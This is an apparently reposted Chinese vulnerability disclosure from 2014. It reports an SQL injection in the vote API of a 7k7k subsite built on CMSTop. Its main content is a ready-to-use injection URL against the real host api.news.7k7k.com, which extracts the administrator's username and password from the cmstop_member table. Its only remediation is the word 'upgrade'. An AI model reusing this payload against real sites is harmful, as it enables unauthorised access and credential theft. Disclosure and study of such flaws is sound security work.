7k7k某业务存在SQL注射漏洞及修复方案下载

来源:黑吧安全网 浏览:899次 时间:2014-05-07
做网站找雨过天晴工作室

7k7k某业务存在SQL注射漏洞(暴露管理员密码与后台地址)某个业务采用 cmstop 建站系统, 但是 app那个 地方 漏洞 未修复

比较奇葩的就是 有时候 可以 测试出来漏洞 与时候 却又 不可以 , 难道因为 CDN 的问题? 漏洞的 测试成功与否 只能看人品了。。。

 

http://api.news.7k7k.com/?app=vote&controller=vote&action=total&contentid=1%20and%201=2%20union%20select%20concat(username,char(0x3d),password)%20from%20cmstop_member%20where%20userid=1;%23

http://api.news.7k7k.com/?app=vote&controller=vote&action=total&contentid=1 存在注入的地方

这貌似是 管理员啊,, 再来 第二张

修复方案:

升级吧 。。。